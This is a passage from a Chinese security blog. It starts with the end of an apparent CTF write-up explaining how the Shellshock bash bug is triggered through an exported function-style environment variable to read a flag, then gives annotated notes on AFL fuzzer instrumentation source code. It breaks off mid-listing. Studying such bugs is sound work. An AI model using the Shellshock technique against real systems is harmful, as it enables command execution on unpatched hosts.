<p>然后就是构造触发shellshock漏洞的语句</p>
<p><a href="https://en.wikipedia.org/wiki/Shellshock_(software_bug)" target="_blank" rel="noopener">wiki上面有链接</a>，原理跟linux环境变量相关，bash中可以通过环境变量来导入function，此时的function也会当做普通环境变量来处理，具体就是<code>函数名=&#39;(){ ...; };&#39;</code>，这样子的键值对，而在处理这个function变量的时候，有漏洞的bash版本只检查了前几个字符</p>
<p><code>STREQN (&quot;() {&quot;, string, 4)</code></p>
<p>然后将整条字符串全部当做脚本代码处理了，本意应该是起子实例的时候，将这个函数的代码字符串直接跑到子实例bash中，供后续调用。但是这里并没有做语法检查或者结尾检查之类的，所以如果函数后面跟了命令也会被跑出来</p>
<p>所以利用流程就是export一个函数类型的环境变量，然后再起一个bash就会触发后续命令</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210407232747355.png" alt="image-20210407232747355" style="zoom:80%;">

<p>原理大致如下，再结合我们的程序代码，可以看到程序刚好用system起了一个bash，所以export我们的构造语句之后再跑程序就可以直接cat flag了</p>
<p>如图：</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210407233151874.png" alt="image-20210407233151874" style="zoom:80%;">

<p>好像后续有些版本export就会加前后缀什么的了，修复的方式这里不深究，以后需要再看</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/02/05/alf-fuzz-source-code-partly/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2021/02/05/alf-fuzz-source-code-partly/" class="post-title-link" itemprop="url">alf-fuzz source code(partly)</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-02-05 16:29:23 / Modified: 22:14:45" itemprop="dateCreated datePublished" datetime="2021-02-05T16:29:23+08:00">2021-02-05</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/02/05/alf-fuzz-source-code-partly/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/02/05/alf-fuzz-source-code-partly/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>照着<a href="https://xz.aliyun.com/t/4314" target="_blank" rel="noopener">这篇博客</a>先把fuzz的门入了</p>
<h1 id="AFL源码粗略分析笔记"><a href="#AFL源码粗略分析笔记" class="headerlink" title="AFL源码粗略分析笔记"></a>AFL源码粗略分析笔记</h1><p>我是从<a href="https://xz.aliyun.com/t/4628" target="_blank" rel="noopener">这篇</a>和<a href="https://www.anquanke.com/post/id/201760" target="_blank" rel="noopener">这篇</a>开始看的，具体概念这两篇文章也写的很清楚了，下面只是记一些粗略的笔记</p>
<h2 id="afl-gcc-c"><a href="#afl-gcc-c" class="headerlink" title="afl-gcc.c"></a>afl-gcc.c</h2><p>afl-gcc主要是gcc的一个封装(wrapper)，main中主要执行这三个函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">find_as(argv[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line">edit_params(argc, argv);</span><br><span class="line"></span><br><span class="line">execvp(cc_params[<span class="number">0</span>], (<span class="keyword">char</span>**)cc_params);</span><br></pre></td></tr></table></figure>

<h3 id="find-as："><a href="#find-as：" class="headerlink" title="find_as："></a>find_as：</h3><p>这个函数的作用是找到对应的编译器</p>
<h3 id="edit-params："><a href="#edit-params：" class="headerlink" title="edit_params："></a>edit_params：</h3><p>主要是对编译参数做一些设置，用<code>-B</code>指定了编译汇编器等，主要是为了插桩</p>
<p><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/20190330215605-8fcb26f2-52f3-1.png" alt="img"></p>
<h3 id="execvp："><a href="#execvp：" class="headerlink" title="execvp："></a>execvp：</h3><p>用处理之后的编译参数进行源码编译</p>
<h2 id="afl-as-c和afl-as-h"><a href="#afl-as-c和afl-as-h" class="headerlink" title="afl-as.c和afl-as.h"></a>afl-as.c和afl-as.h</h2><p>就是这里进行的插桩，可以看到编译出来的代码多了一些插入的东西，比如<code>__afl_maybe_log</code></p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210127135753497.png" alt="image-20210127135753497" style="zoom:50%;">

<p>afl-as.c中的关键函数<code>add_instrumentation</code>，使用fprintf将插桩用的代码插入，用来统计覆盖率，这里大致看一下插桩的逻辑</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (   !pass_thru  &amp;&amp;  !skip_intel  &amp;&amp;  !skip_app  &amp;&amp;  !skip_csect <span class="comment">//这四个变量为1时跳过对应的插桩，具体看后面的分析</span></span><br><span class="line">    &amp;&amp;  instr_ok  &amp;&amp;  instrument_next  &amp;&amp;  <span class="built_in">line</span>[<span class="number">0</span>] == <span class="string">'\t'</span>  &amp;&amp;  <span class="built_in">isalpha</span>(<span class="built_in">line</span>[<span class="number">1</span>])<span class="comment">//这里line[0]和isalpha应该是对应汇编文件的格式判断插入的位置，没有深入研究，instr_ok和instrument_next看后面的分析</span></span><br><span class="line">   ) </span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">      <span class="built_in">fprintf</span>(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE));<span class="comment">//插桩写入输出文件,R(MAP_SIZE)的作用是提供一个随机数标识插桩点，在后面分析trampoline_fmt_32会写到</span></span><br><span class="line">      instrument_next = <span class="number">0</span>;</span><br><span class="line">      ins_lines++;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"> <span class="built_in">fputs</span>(<span class="built_in">line</span>, outf);<span class="comment">//原来的代码再写入输出文件</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//....(一些代码)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*     </span></span><br><span class="line"><span class="comment">	All right, this is where the actual fun begins. For one, we only want to</span></span><br><span class="line"><span class="comment">	instrument the .text section. So, let's keep track of that in processed</span></span><br><span class="line"><span class="comment">	files - and let's set instr_ok accordingly. </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">line</span>[<span class="number">0</span>] == <span class="string">'\t'</span> &amp;&amp; <span class="built_in">line</span>[<span class="number">1</span>] == <span class="string">'.'</span>) <span class="comment">//这个if分值就和注释写的一样，为了只在代码段进行插入，自己不习惯太乱的代码格式就自己稍微改了改了排版</span></span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">      <span class="comment">/* OpenBSD puts jump tables directly inline with the code, which is</span></span><br><span class="line"><span class="comment">         a bit annoying. They use a specific format of p2align directives</span></span><br><span class="line"><span class="comment">         around them, so we use that as a signal. */</span></span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (!clang_mode &amp;&amp; instr_ok &amp;&amp; !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"p2align "</span>, <span class="number">8</span>) </span><br><span class="line">          &amp;&amp; <span class="built_in">isdigit</span>(<span class="built_in">line</span>[<span class="number">10</span>]) &amp;&amp; <span class="built_in">line</span>[<span class="number">11</span>] == <span class="string">'\n'</span>)     skip_next_label = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (!<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"text\n"</span>, <span class="number">5</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"section\t.text"</span>, <span class="number">13</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"section\t__TEXT,__text"</span>, <span class="number">21</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"section __TEXT,__text"</span>, <span class="number">21</span>)</span><br><span class="line">         ) </span><br><span class="line">      &#123;</span><br><span class="line">        instr_ok = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">continue</span>; </span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (!<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"section\t"</span>, <span class="number">8</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"section "</span>, <span class="number">8</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"bss\n"</span>, <span class="number">4</span>) ||</span><br><span class="line">          !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">2</span>, <span class="string">"data\n"</span>, <span class="number">5</span>)</span><br><span class="line">         ) </span><br><span class="line">      &#123;</span><br><span class="line">        instr_ok = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Detect off-flavor assembly (rare, happens in gdb). When this is</span></span><br><span class="line"><span class="comment">       encountered, we set skip_csect until the opposite directive is</span></span><br><span class="line"><span class="comment">       seen, and we do not instrument. </span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".code"</span>))<span class="comment">//这里可以看到skip_csect是检测.code格式设置的，比较少见</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".code32"</span>)) skip_csect = use_64bit;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".code64"</span>)) skip_csect = !use_64bit;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Detect syntax changes, as could happen with hand-written assembly.</span></span><br><span class="line"><span class="comment">       Skip Intel blocks, resume instrumentation when back to AT&amp;T. */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".intel_syntax"</span>)) skip_intel = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".att_syntax"</span>)) skip_intel = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Detect syntax changes, as could happen with hand-written assembly.</span></span><br><span class="line"><span class="comment">       Skip Intel blocks, resume instrumentation when back to AT&amp;T. */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".intel_syntax"</span>)) skip_intel = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">".att_syntax"</span>)) skip_intel = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Detect and skip ad-hoc __asm__ blocks, likewise skipping them. */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">line</span>[<span class="number">0</span>] == <span class="string">'#'</span> || <span class="built_in">line</span>[<span class="number">1</span>] == <span class="string">'#'</span>) </span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">"#APP"</span>)) skip_app = <span class="number">1</span>;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">"#NO_APP"</span>)) skip_app = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="comment">//上面这三个写的比较清楚就不解释辽</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//....(一些代码)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">   Conditional branch instruction (jnz, etc). We append the instrumentation</span></span><br><span class="line"><span class="comment">   right after the branch (to instrument the not-taken path) and at the</span></span><br><span class="line"><span class="comment">   branch destination label (handled later on). </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">line</span>[<span class="number">0</span>] == <span class="string">'\t'</span>) <span class="comment">//这里有个比较重要的分支，当指令不是jmp而是一些条件跳转指令时，会在条件跳转指令之后进行插桩，还有对应的目标地址处（在后面处理）</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">line</span>[<span class="number">1</span>] == <span class="string">'j'</span> &amp;&amp; <span class="built_in">line</span>[<span class="number">2</span>] != <span class="string">'m'</span> &amp;&amp; R(<span class="number">100</span>) &lt; inst_ratio) <span class="comment">//这个int_ratio暂时没管是干嘛的...</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE));</span><br><span class="line">        ins_lines++;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*  </span></span><br><span class="line"><span class="comment">Label of some sort. This may be a branch destination, but we need to</span></span><br><span class="line"><span class="comment">tread carefully and account for several different formatting</span></span><br><span class="line"><span class="comment">conventions. 这里就是在打上了Label的地方进行插桩，可能是跳转指令的目的地址</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">    <span class="comment">/* Everybody else: .L&lt;whatever&gt;: */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strstr</span>(<span class="built_in">line</span>, <span class="string">":"</span>))</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">line</span>[<span class="number">0</span>] == <span class="string">'.'</span>)<span class="comment">//判断到是一个Label</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="comment">/* .L0: or LBB0_0: style jump destination 跳转Label*/</span></span><br><span class="line">        <span class="keyword">if</span> ((<span class="built_in">isdigit</span>(<span class="built_in">line</span>[<span class="number">2</span>]) || (clang_mode &amp;&amp; !<span class="built_in">strncmp</span>(<span class="built_in">line</span> + <span class="number">1</span>, <span class="string">"LBB"</span>, <span class="number">3</span>))) &amp;&amp; R(<span class="number">100</span>) &lt; inst_ratio) </span><br><span class="line">        &#123;</span><br><span class="line">          <span class="comment">/* An optimization is possible here by adding the code only if the</span></span><br><span class="line"><span class="comment">             label is mentioned in the code in contexts other than call / jmp.</span></span><br><span class="line"><span class="comment">             That said, this complicates the code by requiring two-pass</span></span><br><span class="line"><span class="comment">             processing (messy with stdin), and results in a speed gain</span></span><br><span class="line"><span class="comment">             typically under 10%, because compilers are generally pretty good</span></span><br><span class="line"><span class="comment">             about not generating spurious intra-function jumps.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">             We use deferred output chiefly to avoid disrupting</span></span><br><span class="line"><span class="comment">             .Lfunc_begin0-style exception handling calculations (a problem on</span></span><br><span class="line"><span class="comment">             MacOS X). */</span></span><br><span class="line">          <span class="keyword">if</span> (!skip_next_label) instrument_next = <span class="number">1</span>; <span class="keyword">else</span> skip_next_label = <span class="number">0</span>;<span class="comment">//这里跟前面的那个标志也有关系</span></span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> </span><br><span class="line">      &#123;</span><br><span class="line">        <span class="comment">/* Function label (always instrumented, deferred mode). 函数Label*/</span></span><br><span class="line">        instrument_next = <span class="number">1</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="comment">//到这里大循环的插桩就结束了，之后还有补充的小块代码就不写了，主要就是这些：只在代码段插桩、在有函数Label（函数入口）和跳转Label处插桩，在条件条状指令之后插桩</span></span><br></pre></td></tr></table></figure>

<p>afl-as.h中就是具体的插桩代码，以32位为例来分析</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> u8* trampoline_fmt_32 =</span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"/* --- AFL TRAMPOLINE (32-BIT) --- */\n"</span></span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">".align 4\n"</span></span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"leal -16(%%esp), %%esp\n"</span></span><br><span class="line">  <span class="string">"movl %%edi,  0(%%esp)\n"</span></span><br><span class="line">  <span class="string">"movl %%edx,  4(%%esp)\n"</span></span><br><span class="line">  <span class="string">"movl %%ecx,  8(%%esp)\n"</span></span><br><span class="line">  <span class="string">"movl %%eax, 12(%%esp)\n"</span></span><br><span class="line">  <span class="string">"movl $0x%08x, %%ecx\n"</span> <span class="comment">//这里%08x就是前面fprintf中R(MAP_SIZE)的写入点，用作随机数标识</span></span><br><span class="line">  <span class="string">"call __afl_maybe_log\n"</span></span><br><span class="line">  <span class="string">"movl 12(%%esp), %%eax\n"</span></span><br><span class="line">  <span class="string">"movl  8(%%esp), %%ecx\n"</span></span><br><span class="line">  <span class="string">"movl  4(%%esp), %%edx\n"</span></span><br><span class="line">  <span class="string">"movl  0(%%esp), %%edi\n"</span></span><br><span class="line">  <span class="string">"leal 16(%%esp), %%esp\n"</span></span><br><span class="line">  <span class="string">"\n"</span></span><br><span class="line">  <span class="string">"/* --- END --- */\n"</span></span><br><span class="line">  <span class="string">"\n"</span>;</span><br></pre></td></tr></table></figure>

<p>payload根据实际效果删了一些宏定义啥的，看起来好看一点，emmm其实建议直接IDA反汇编看更好?….不过这里汇编有作者的注释帮着看，IDA反汇编图我在代码后面贴上了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br></pre></td><td class="code"><pre><span class="line">main_payload_32 = </span><br><span class="line">  <span class="string">"/* --- AFL MAIN PAYLOAD (32-BIT) --- */\n"</span></span><br><span class="line">  <span class="string">".text\n"</span></span><br><span class="line">  <span class="string">".att_syntax\n"</span></span><br><span class="line">  <span class="string">".code32\n"</span></span><br><span class="line">  <span class="string">".align 8\n"</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_maybe_log:\n"</span></span><br><span class="line">  <span class="string">"  lahf\n"</span> <span class="comment">//将EFLAGS 寄存器标志位加载到AH</span></span><br><span class="line">  <span class="string">"  seto %al\n"</span> <span class="comment">//为溢出置位</span></span><br><span class="line">    </span><br><span class="line">  <span class="string">"  /* Check if SHM region is already mapped. */\n"</span></span><br><span class="line">  <span class="string">"  movl  __afl_area_ptr, %edx\n"</span></span><br><span class="line">  <span class="string">"  testl %edx, %edx\n"</span></span><br><span class="line">  <span class="string">"  je    __afl_setup\n"</span> <span class="comment">//检查共享内存指针是否到位</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_store:\n"</span></span><br><span class="line">  <span class="string">"  /* Calculate and store hit for the code location specified in ecx. There\n"</span></span><br><span class="line">  <span class="string">"     is a double-XOR way of doing this without tainting another register,\n"</span></span><br><span class="line">  <span class="string">"     and we use it on 64-bit systems; but it's slower for 32-bit ones. */\n"</span></span><br><span class="line">  <span class="string">"  movl __afl_prev_loc, %edi\n"</span></span><br><span class="line">  <span class="string">"  xorl %ecx, %edi\n"</span></span><br><span class="line">  <span class="string">"  shrl $1, %ecx\n"</span></span><br><span class="line">  <span class="string">"  movl %ecx, __afl_prev_loc\n"</span></span><br><span class="line">  <span class="string">"  incb (%edx, %edi, 1)\n"</span> <span class="comment">//根据随机数存储执行位置，算法在后文分析</span></span><br><span class="line">    The shared_mem[] <span class="built_in">array</span> is a <span class="number">64</span> kB SHM region passed to the instrumented binary</span><br><span class="line">by the caller. Every <span class="keyword">byte</span> <span class="built_in">set</span> in the output <span class="built_in">map</span> can be thought of as a hit <span class="keyword">for</span></span><br><span class="line">a particular (branch_src, branch_dst) tuple in the instrumented code.</span><br><span class="line">    </span><br><span class="line">  <span class="string">"__afl_return:\n"</span></span><br><span class="line">  <span class="string">"  addb $127, %al\n"</span></span><br><span class="line">  <span class="string">"  sahf\n"</span></span><br><span class="line">  <span class="string">"  ret\n"</span></span><br><span class="line"></span><br><span class="line">  <span class="string">".align 8\n"</span></span><br><span class="line"></span><br><span class="line">  <span class="string">"__afl_setup:\n"</span><span class="comment">//setup只会在最开始调用afl_maybe_log处触发，即main函数的最前面触发，主要是开启一个目标文件自己的fork循环用来记录执行路径(这个程序自己的fork循环就是forkserver)</span></span><br><span class="line">  <span class="string">"  /* Do not retry setup if we had previous failures. */\n"</span></span><br><span class="line">  <span class="string">"  cmpb $0, __afl_setup_failure\n"</span></span><br><span class="line">  <span class="string">"  jne  __afl_return\n"</span></span><br><span class="line">  <span class="string">"  /* Map SHM, jumping to __afl_setup_abort if something goes wrong.\n"</span></span><br><span class="line">  <span class="string">"     We do not save FPU/MMX/SSE registers here, but hopefully, nobody\n"</span></span><br><span class="line">  <span class="string">"     will notice this early in the game. */\n"</span></span><br><span class="line">  <span class="string">"  pushl %eax\n"</span></span><br><span class="line">  <span class="string">"  pushl %ecx\n"</span></span><br><span class="line">  <span class="string">"  pushl $.AFL_SHM_ENV\n"</span></span><br><span class="line">  <span class="string">"  call  getenv\n"</span></span><br><span class="line">  <span class="string">"  addl  $4, %esp\n"</span></span><br><span class="line">  <span class="string">"  testl %eax, %eax\n"</span></span><br><span class="line">  <span class="string">"  je    __afl_setup_abort\n"</span></span><br><span class="line">  <span class="string">"  pushl %eax\n"</span></span><br><span class="line">  <span class="string">"  call  atoi\n"</span></span><br><span class="line">  <span class="string">"  addl  $4, %esp\n"</span></span><br><span class="line">  <span class="string">"  pushl $0          /* shmat flags    */\n"</span></span><br><span class="line">  <span class="string">"  pushl $0          /* requested addr */\n"</span></span><br><span class="line">  <span class="string">"  pushl %eax        /* SHM ID         */\n"</span></span><br><span class="line">  <span class="string">"  call  shmat\n"</span></span><br><span class="line">  <span class="string">"  addl  $12, %esp\n"</span></span><br><span class="line">  <span class="string">"  cmpl $-1, %eax\n"</span></span><br><span class="line">  <span class="string">"  je   